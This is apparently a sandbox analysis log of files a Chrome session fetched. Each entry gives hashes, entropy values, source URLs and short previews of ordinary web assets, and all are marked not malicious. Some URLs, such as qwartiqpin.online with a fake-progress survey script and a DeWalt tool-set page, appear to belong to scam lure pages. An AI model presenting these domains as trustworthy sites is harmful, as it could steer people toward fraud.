                                                                                        Entropy (8bit):4.37456206497237
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C2F60747FB1CD15FCE8A383D3B4B212E
                                                                                        SHA1:B548439B3A296CF73166CEBB1597F7E26706B241
                                                                                        SHA-256:841A5CADD3991F3B722726A6C33F6BA18CFCE25F539AF82D7B0399154649BCBC
                                                                                        SHA-512:22D5537F4D4A18FE1B6262EA4DEEB06F74C93370C37732CCFAF9FA74B7AAC43823EC5C86E1C2ECD7810264F492A0C044967131E5C7595C2BFBBB902B7D27C231
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="125" height="36" viewBox="0 0 125 36" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_3159_223837)">..<path d="M18.0457 0H106.455C116.414 0 124.5 8.06542 124.5 18C124.5 27.9346 116.414 36 106.454 36H18.0457C8.0859 36 0 27.9346 0 18C0 8.06542 8.0859 0 18.0457 0Z" fill="#CC1011"/>..<path d="M19.7358 11.3384V25.4048H16.5732V11.3384H19.7358Z" fill="white"/>..<path d="M33.4833 21.4259C33.4833 23.9981 31.7101 25.4048 28.2856 25.4048H22.1211V11.3384H27.8421C30.9852 11.3384 32.6971 12.6647 32.6971 15.1765C32.6971 16.4425 31.9916 17.4269 30.9442 17.9899C32.6367 18.6326 33.4825 19.9395 33.4825 21.4259H33.4833ZM25.2836 14.0111V16.9451H27.5398C28.6679 16.9451 29.4331 16.6234 29.4331 15.4982C29.4331 14.373 28.647 14.0111 27.5398 14.0111H25.2836ZM28.1445 22.7321C29.4338 22.7321 30.2192 22.2495 30.2192 21.0841C30.2192 19.9187 29.4331 19.416 28.1445 19.416H25.2836V22.7314H28.1445V22.7321Z" fill="white"/>..<path d="M38.3656 11.3384V25.4048H35.2031V11.3384H38.3656Z"
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):8147
                                                                                        Entropy (8bit):5.321008352556851
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C6CFEE7C77F3BE97471B0085C419DB20
                                                                                        SHA1:4721A5B719C68098856A28CA1307F68581588853
                                                                                        SHA-256:5A2E118A815E6DE6042A2E004718938E3068FFDF3FCA85010A37FCAAA72D49AE
                                                                                        SHA-512:6CDCE62C837ECCFF63A5E4D715ED56574C00DBE66E683735CAB50C7256433EB5B05437191E652F81F21E257669920C3C3DBC6F739FAF796EA0F9154839F13717
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/js/intl_functions.js?v=fb00c92e59fc03510f7e6c64e8419364
                                                                                        Preview:let o_survey = null;.let s_step = 0;.let lastQuestion = "";.function startINTSurvey(st){..if (typeof template_name != 'undefined' && template_name === 'blanks') {...$('#confirm_popmessage').removeAttr('onclick');...$('.dis-ed-1').hide();...$('#pop-message-con').addClass('animated fadeOut');...$('#del-pack-con, #head-con, #load-track-con-ed-1').addClass('animated fadeIn').css({'display':'block','opacity':'0'});...$('#foot-con').hide();...$('.progress-bar').css({"width": "10%"});...$('.val-progr strong').html('10%');.../*end blanks*/...setTimeout(function () {....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1) i').removeClass('fa-spinner fa-spin').addClass('fa-check-circle');....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1)').addClass('checked');...}, 2000),...setTimeout(function () {....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(2) i').removeClass('fa-spinner fa-spin').addClass('fa-check-circle');....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):527
                                                                                        Entropy (8bit):5.238252421110639
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C5B9CF272CB2C81CA4E8C09061F1FB37
                                                                                        SHA1:A5DD1B870FA7664A189F839707E8C78572D9D271
                                                                                        SHA-256:91F6603D43997B336D379CC3B6C424204378491E41C74C03DA8301C5F841350A
                                                                                        SHA-512:78C4263E5B7C72608AF47191D408B9295F797D3A057D8743164DC798424BA2E15575F07F29B3DC00BFCDD810164AEB4931B4AC674229A2088314225ACFC89A5F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" focusable="false" width="1em" height="1em" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" class="iconify icon ml-1 icon-white float-right float-lg-none mr-4 mr-lg-3" data-icon="ic:baseline-expand-more" data-inline="false">...<path fill="currentColor" d="M16.59 8.59L12 13.17L7.41 8.59L6 10l6 6l6-6z"></path>..</svg>
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (2854)
                                                                                        Category:downloaded
                                                                                        Size (bytes):51682
                                                                                        Entropy (8bit):5.545780836698791
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C5D65EFF968D2793CCAFCC3BEA5D79E6
                                                                                        SHA1:8405D29F2E1A6662316A4CBDC8BAFA2B18A5CD2E
                                                                                        SHA-256:B5258833B292A363AD951812C4782963F88026005E4A7DBB766313EDDFCC7A78
                                                                                        SHA-512:D335F73CBB8DD7CF489A1BE1589DD5944C031F02CF7CBFAB5E6E02EF60D489CC1F8C407B11C885F874684C26C2E4E5EEF1967E5F2B49969565907CBE015864E8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.matomo.cloud/ibisworld.matomo.cloud/matomo.js
                                                                                        Preview:/*!!. * Matomo - free/libre analytics platform. *. * JavaScript tracking client. *. * @link https://piwik.org. * @source https://github.com/matomo-org/matomo/blob/master/js/piwik.js. * @license https://piwik.org/free-software/bsd/ BSD-3 Clause (also in js/LICENSE.txt). * @license magnet:?xt=urn:btih:c80d50af7d3db9be66a4d0a86db0286e4fd33292&dn=bsd-3-clause.txt BSD-3-Clause. */.;if(typeof _paq!=="object"){_paq=[]}if(typeof window.Matomo!=="object"){window.Matomo=window.Piwik=(function(){var s,b={},A={},K=document,g=navigator,ac=screen,X=window,h=X.performance||X.mozPerformance||X.msPerformance||X.webkitPerformance,u=X.encodeURIComponent,W=X.decodeURIComponent,k=unescape,M=[],I,v,am=[],z=0,ag=0,Y=0,m=false,q="";function p(au){try{return W(au)}catch(av){return unescape(au)}}function N(av){var au=typeof av;return au!=="undefined"}function D(au){return typeof au==="function"}function aa(au){return typeof au==="object"}function y(au){return typeof au==="string"||au instanceof String}function
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):1565
                                                                                        Entropy (8bit):4.501775282608727
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FC8F0B6C7C4F5D6982D6D9650F1D95B5
                                                                                        SHA1:8A8210A5B2C32DDF01AD858C2531296C22E823B6
                                                                                        SHA-256:B6BBAE8ACF17C24E58A54DD9B12576CE254311459E46161B4DAE5B07999B4A62
                                                                                        SHA-512:380EAA8D73E6628066F696B872025AB7B493D08DD030DC9767C50784A046D23A0CAB41CBCE97C84993FC490FEBE9BC213C3F19E2544AFCC99E5C6DCC88777C5B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-uk.svg
                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M15.135 0.758545H1.53153C0.869721 0.758545 0.333252 1.29501 0.333252 1.95683V10.043C0.333252 10.7048 0.869721 11.2413 1.53153 11.2413H15.135C15.7968 11.2413 16.3333 10.7049 16.3333 10.043V1.95683C16.3333 1.29501 15.7968 0.758545 15.135 0.758545Z" fill="#41479B"/>..<path d="M16.3167 1.75876C16.2222 1.19129 15.7293 0.758545 15.135 0.758545H14.8232L9.71256 4.10689V0.758576H6.95394V4.10692L1.84331 0.758576H1.53153C0.937252 0.758576 0.444283 1.19129 0.349846 1.75879L4.71791 4.62067H0.333252V7.3793H4.71791L0.349846 10.2411C0.444283 10.8086 0.937252 11.2413 1.53153 11.2413H1.84331L6.95394 7.89298V11.2413H9.71256V7.89298L14.8232 11.2413H15.135C15.7293 11.2413 16.2222 10.8086 16.3167 10.2411L11.9486 7.37923H16.3333V4.62061H11.9486L16.3167 1.75876Z" fill="#F5F5F5"/>..<path d="M9.16085 0.758545H7.50566V5.17233H0.333252V6.82751H7.50566V11.2413H9.16085V6.82751H16.3333V5.17233H9.16085V0.758545Z"
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6AC1C307BB1B5F4291A767DC4D74B675
                                                                                        SHA1:7983B245565017908ECDFAB54185C3240D3DD683
                                                                                        SHA-256:975CC06E8D52C8442BC64822C602CD031F4A325B4053E65361AE5BA4C445B1B7
                                                                                        SHA-512:CDA37C427712016F3D5CE3257F2356D2FF9B7550C983FCB9E97752E6E5F81DF4712B8043F81282A5D1F85E95E95548314357044A9375D82C356E29969F381326
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://secure.detailsinventivegroup.com/js/787582.js
                                                                                        Preview:// /js/787582.js
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):2258
                                                                                        Entropy (8bit):7.384277650367209
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F0B1BEA0D384E35930C51B4B853D2BA4
                                                                                        SHA1:2937A5D7687AD77FE579E87B64DB011D999D256F
                                                                                        SHA-256:EC006ED8744A3D28521058DE2DCF88A3B2B6675AF4C094410BDC7026DB636D23
                                                                                        SHA-512:BB181162C923B657B4B67194B6E07A425A7F97656E1CC8C41EB866E13A0902231001509B165C61760507E992D7069D27C1055024F9E40D76535A47DD238ACBF2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/images/ci6.jpg
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:394958298B8011ED897FE6EA09CE6585" xmpMM:DocumentID="xmp.did:3949582A8B8011ED897FE6EA09CE6585"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:394958278B8011ED897FE6EA09CE6585" stRef:documentID="xmp.did:394958288B8011ED897FE6EA09CE6585"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5789), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):5789
                                                                                        Entropy (8bit):5.343535523591216
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:1F865F86A76B9D9BA098478E39472253
                                                                                        SHA1:89CD1E6681370059F0F3FCE028A250FE7842D8F0
                                                                                        SHA-256:FD4BAE21522904E0B228EE185CA1F8AF02D82210827360DFB71EAA01D9A353C0
                                                                                        SHA-512:ACD3A2CA7DCE3FC42EFFB66845EC9943790E64B594CAEFDF4C3516BB45F7D90B2427A77DF963548CF0C2AA4A0BA2777CD4101B447A0772C8C6B4418EB3C91B35
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/ibisworld-initialize.min.css
                                                                                        Preview:@font-face{font-family:'Pangea Text';font-style:normal;font-weight:400;font-display:auto;src:url(../fonts/PangeaText-Regular.woff) format('woff2')}@font-face{font-family:'Pangea Text Medium';font-style:normal;font-weight:500;font-display:auto;src:local('Pangea Text Medium'),local('PangeaText-Medium'),url(../fonts/PangeaText-Medium.woff) format('woff2')}@font-face{font-family:'Pangea Text Bold';font-style:normal;font-weight:800;font-display:auto;src:local('Pangea Text Bold'),local('PangeaText-Bold'),url(../fonts/PangeaText-Bold.woff) format('woff2')}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-display:auto;src:local('Roboto'),local('Roboto-Regular'),url(https://fonts.gstatic.com/s/roboto/v19/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2');unicode-range:U+100-24F,U+259,U+1E00-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-display:auto;src:local('Roboto'),local('Roboto-Regul
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:assembler source, ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):10587
                                                                                        Entropy (8bit):5.176945857092317
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:134A373C9B1B3794B61B9EF49A6B69A2
                                                                                        SHA1:62290A846F901B6682AD63EE3EA4085756F02F1F
                                                                                        SHA-256:2CE7C20F09B5E2D16E967678056687BAF88F86BAA41F93C671FB81E39E763A3F
                                                                                        SHA-512:C0D597AEA962F2CE0B715D8E15A4C7E0C508553C4A6C7F48A1C73BB9A1B906E2AB47FA6751ED1097AA24B07304F1F0022C87DE1768756D91FC2377B69667C6CB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/assets/css/app.css
                                                                                        Preview:.clear,..clearfix:after {..clear: both.}.a img,.img {..height: auto;..max-width: 100%.}.body {..margin: 0;..padding: 0;..font-family: Arial, sans-serif;..font-size: 15px.}.li,.ul {..list-style-type: none.}..left {..float: left.}..right {..float: right.}..clearfix:after,..clearfix:before {..content: " ";..display: table.}..alignRright {..float: right;..margin: 0 0 12px 15px.}..alignLeft,..float-left {..float: left.}..alignLeft {..margin: 0 15px 12px 0.}..alignCenter {..float: none!important;..margin: 0 auto;..display: block.}.a img,.img {..border: 0.}..text-left {..text-align: left.}..text-right {..text-align: right.}..text-center {..text-align: center.}..text-justify {..text-align: justify.}..config-errors h3 {..padding: 10px 0;..margin: 5px.}..config-errors ul {..padding: 0;..margin: 0.}..config-errors li {..padding: 10px;..margin: 5px;..background-color: #FCC;..border: 1px solid #C00;..color: #333;..font: 15px/20px arial, sans-serif.}..config-errors li strong {..float: right.}.input[
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5249)
                                                                                        Category:downloaded
                                                                                        Size (bytes):238160
                                                                                        Entropy (8bit):5.545053481726209
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:255BF0C79431994866A776F05C039DED
                                                                                        SHA1:111C35085A8A9A224E0D090722228660731ECDBB
                                                                                        SHA-256:6B774C5DB4394A53CF56C1F93C0EBB23E14586AD123BF4EB37F33F949585B5F4
                                                                                        SHA-512:61D8164808AB4F5B223047D2423A6DF91BF93D34604E1883DBC7C77A099560C502FD03EC3AB59433D01E57521112DB6879583B3A0CE2A8A8A430AB8EAE86A6F6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-53C84SB
                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"67",. . "macros":[{"function":"__aev","vtp_varType":"TEXT"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"MembershipOption"},{"function":"__smm","vtp_setDefaultValue":true,"vtp_input":["macro",1],"vtp_defaultValue":"none","vtp_map":["list",["map","key","\/cartv2\/upgrade.aspx","value",["template",["macro",1],"-",["macro",3]]],["map","key","\/membership.aspx","value",["template",["macro",1],"-",["macro",3]]],["map","key","\/payment.aspx","value",["template",["macro",1],"-",["macro",3]]],["map","key","\/receipt.aspx","value",["template",["macro",1],"-",["macro",3]]]]},{"function":"__smm","vtp_setDefaultValue":true,"vtp_input":["macro",1],
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):1941
                                                                                        Entropy (8bit):7.225618469250057
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:546D32BD0483833DC313AAC67C27C314
                                                                                        SHA1:0E4F8BE2C3E2F8E1BA8F2D4E5B1D221F205C07EC
                                                                                        SHA-256:AB01E78F9A01B905E2DF63B9509738A116AC5AD60AABC8876CE241B91733DD03
                                                                                        SHA-512:FF640D21CB22BBD59E8740F3F28A8DE923430CF347279004BD3BF9570C1A131DB316ECDCB706E2D239B7432F2E8752BBE1968150E21815D63C55D0B55F41A150
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:69E9D0F58B7F11EDBCAABE6CC3ECE5FA" xmpMM:DocumentID="xmp.did:69E9D0F68B7F11EDBCAABE6CC3ECE5FA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69E9D0F38B7F11EDBCAABE6CC3ECE5FA" stRef:documentID="xmp.did:69E9D0F48B7F11EDBCAABE6CC3ECE5FA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 327824, version 772.1280
                                                                                        Category:downloaded
                                                                                        Size (bytes):327824
                                                                                        Entropy (8bit):7.997665630678108
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:E0F1F10202002BF91422FD3768C2D744
                                                                                        SHA1:EC47D73D219D2ADB2971F85450FD1824D38A2DB3
                                                                                        SHA-256:BDB9CA4674E16A180AD38BA1B55EA1224A38677E604F5C5E560B85194970B85A
                                                                                        SHA-512:5B0830861447D3E25D58CBD3FC65155ECAF6624B6CFC5AA5FB9115330681F3BF141AB2E749226924DFEA45DF7ABAEE3A899965C581A9A9B8F0C4FD5A4857612F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff2
                                                                                        Preview:wOF2...................E.........................8.$. .`..T...0..X..X..d. ...t,..8..|.~8"E.............PUU....j?.._~.?../.........;. Lf..fw8]n...7Td......{.......T...Z.(.*.Z.. ...y...k....g.....8A=..k"..Uy.yQ...33.q........o...U..;...........x../.BDlb..v.H......*.|mV......./kr.U?.Y.VL.$......|..J~..Dl.so@HU....C...Uo...d.T...?N....W...]..*..mu.,..nC..3.aOf'....8.s...9...s.Z...#.;v.|<Y9.....ux..L.........p{..t:..$...G(....tB..(.. ....1 ...c@D.......6.i.q>........U....Xu.........ifgg.w.$.`D<...e.Y.b.!^C...O...v..s.......y.o......$...Z..E.........D.t.....O...r3.U..EPD..jA8.k..~...a)...M=u......U..G...kw.2.}....+,.B8z..Q.....X..GH...DhK!$...}...I..C..1....|E.f...Y.~U._.s.....}..j.{#.7"..@.F...7..{.}o.s...A*..i..d......'(....F.`#..........;... e=.rf.../..|.....U..%.K......e3./..*..?~......to.)...p......A/c..j....H"v...~..i...B.12..d.YPa......W..H.....Q..wEW.!@...M.u...s....#.2T.......B..h.i.{.iwg.v.....$$.em{....6j5..L.eL..w...[.W..!...Cf.h
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):5632
                                                                                        Entropy (8bit):4.138110766825123
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6B20DAAC8D215762B1E26D2A2DD1EFEE
                                                                                        SHA1:966C0177DD0FA0B30980E940F18DA3364A60A28E
                                                                                        SHA-256:6A2BB751C04A48F8821F0522DBE8C2427BB5B09DCD8CCA4F42569A23E847AB33
                                                                                        SHA-512:2EFC014328D7D7DE632EF2929DC1502A58D8A0FBE7574AB4F0B862861357F2DBC7ABB5E3A6E9F69578056332670A2634A466CCDA61E8EFF9FF41AA35878B65FB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-eu.svg
                                                                                        Preview:<svg width="16" height="12" viewBox="0 0 16 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M14.8017 0.758545H1.19828C0.536469 0.758545 0 1.29501 0 1.95683V10.0431C0 10.7049 0.536469 11.2414 1.19828 11.2414H14.8017C15.4635 11.2414 16 10.7049 16 10.0431V1.95683C16 1.29501 15.4635 0.758545 14.8017 0.758545Z" fill="#41479B"/>..<path d="M8.11206 1.95896L8.22268 2.29062L8.57227 2.29334C8.61756 2.29368 8.63631 2.35143 8.5999 2.37834L8.31865 2.58602L8.42409 2.91934C8.43774 2.96246 8.38862 2.99821 8.35177 2.97187L8.06737 2.76855L7.78296 2.97187C7.74615 2.99818 7.69699 2.96249 7.71065 2.91934L7.81609 2.58602L7.53484 2.37834C7.49843 2.35143 7.51718 2.29368 7.56246 2.29334L7.91206 2.29062L8.02268 1.95896C8.03696 1.91602 8.09774 1.91602 8.11206 1.95896Z" fill="#FFE15A"/>..<path d="M8.11206 9.07959L8.22268 9.41125L8.57227 9.41397C8.61756 9.41431 8.63631 9.47206 8.5999 9.49897L8.31865 9.70665L8.42409 10.04C8.43774 10.0831 8.38862 10.1188 8.35177 10.0925L8.06737 9.88918L7.78296 10.0925C
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70", baseline, precision 8, 250x334, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):11358
                                                                                        Entropy (8bit):7.910953175226705
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FC164559C862F20304CFB18C67F93DE5
                                                                                        SHA1:18AED480948E158C14237DD2063A2DF5A575946E
                                                                                        SHA-256:6FC27010BC9B2BC2B82D8B1F662B09751756618565A9D43FD664D5375BA0C147
                                                                                        SHA-512:23812827C6DDE6DE4913F6CC52E5789C576B9502EAC3DCAB5C13C92C6AECC2666AA12764E8F8EF38BDA2030CD61EE9686AD25E0CC9DB2C8DA7FC170072A93DE9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 70....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......N...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...]x...O. ..c].r<...+..O.Fz..p..J..NM ...Q7j.#$.R\........S....3...GE.X.\..y.A.Q.E.ZJ(...(...(...(...(......)sIE..QE....L......t......_Z.......X......_'.%C...7.."...."....?...9Y..~..."C........................4..._.!.}..^.@..`w.]..e........o.!....[.....Y......O..).l..........[....ZA......H......pi.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):16593
                                                                                        Entropy (8bit):3.988296331522371
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:63D4640CAB9C7B1EEB53CF3FAC8978ED
                                                                                        SHA1:E9C5C07E7880A05CA76C5F765EF23695099AB6F8
                                                                                        SHA-256:AD4D5E2442D3D41513B47C53E3E30003D02652BB034E4ABD4E8304C10CBE8CF7
                                                                                        SHA-512:DD1598B83F365AEAC6C5D56E8E4CBBBF61B0AEB791796573017FFAD05F851AD66131D6E9C049DB1A69872A1CC4AF6EED0CC8E766C088ADAE4743C4F2A254EE2F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="17" height="11" viewBox="0 0 17 11" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M16.0573 0H0.609126C0.456783 0 0.333252 0.1235 0.333252 0.275843V10.2069C0.333252 10.3592 0.456783 10.4827 0.609126 10.4827H16.0574C16.2097 10.4827 16.3333 10.3592 16.3333 10.2069V0.275843C16.3332 0.1235 16.2097 0 16.0573 0Z" fill="#82AFFF"/>..<path d="M8.30985 7.29206C9.71304 7.29206 10.8546 6.15044 10.8546 4.74735C10.8546 3.34426 9.71301 2.20264 8.30985 2.20264C6.9067 2.20264 5.76514 3.34426 5.76514 4.74735C5.76514 6.15044 6.90667 7.29206 8.30985 7.29206ZM8.60016 2.46879L8.81888 2.3882C9.12754 2.45476 9.41454 2.57985 9.66716 2.75229C9.64544 2.7501 9.58804 2.74423 9.57813 2.74092C9.56588 2.73685 9.54694 2.81885 9.54694 2.81885L9.64732 2.85879L9.67469 2.75798C9.77894 2.8297 9.87629 2.91035 9.96788 2.99717L9.82032 3.14473H9.79426L9.77304 3.06145L9.69232 2.91635L9.40719 2.81357L9.20997 2.90901L9.32188 3.15129C9.04613 2.97582 8.7226 2.87042 8.3751 2.85851V2.52082L8.57604 2.58426L8.492
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (31972)
                                                                                        Category:downloaded
                                                                                        Size (bytes):57542
                                                                                        Entropy (8bit):5.249236491603885
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:553EDD1B8DD335AB4626F05E6131812A
                                                                                        SHA1:F6D21AFE14D2ABC14E69D3B90A6F744E45BA74C6
                                                                                        SHA-256:AE2DA1BD62C6469EE27770AD1CDDF2E8296D8A7F6D85B091463E5200C5E320AF
                                                                                        SHA-512:7E654C67E741180B83F7B4D829967003FEA37A5D5014F549F0A3D7F945D2B73E73E22A1DD04A7B68712C846F004232F3030D07305784FAB026100AF12AF8F0AC
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/autocomplete.js/0/autocomplete.min.js
                                                                                        Preview:/*!. * autocomplete.js 0.38.1. * https://github.com/algolia/autocomplete.js. * Copyright 2021 Algolia, Inc. and other contributors; Licensed MIT. */.!function(a,b){"object"==typeof exports&&"object"==typeof module?module.exports=b():"function"==typeof define&&define.amd?define([],b):"object"==typeof exports?exports.autocomplete=b():a.autocomplete=b()}(this,function(){return function(a){function b(d){if(c[d])return c[d].exports;var e=c[d]={exports:{},id:d,loaded:!1};return a[d].call(e.exports,e,e.exports,b),e.loaded=!0,e.exports}var c={};return b.m=a,b.c=c,b.p="",b(0)}([function(a,b,c){"use strict";a.exports=c(1)},function(a,b,c){"use strict";function d(a,b,c,d){c=f.isArray(c)?c:[].slice.call(arguments,2);var j=e(a).each(function(a,f){var j=e(f),k=new i({el:j}),l=d||new h({input:j,eventBus:k,dropdownMenuContainer:b.dropdownMenuContainer,hint:void 0===b.hint||!!b.hint,minLength:b.minLength,autoselect:b.autoselect,autoselectOnBlur:b.autoselectOnBlur,tabAutocomplete:b.tabAutocomplete,openO
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
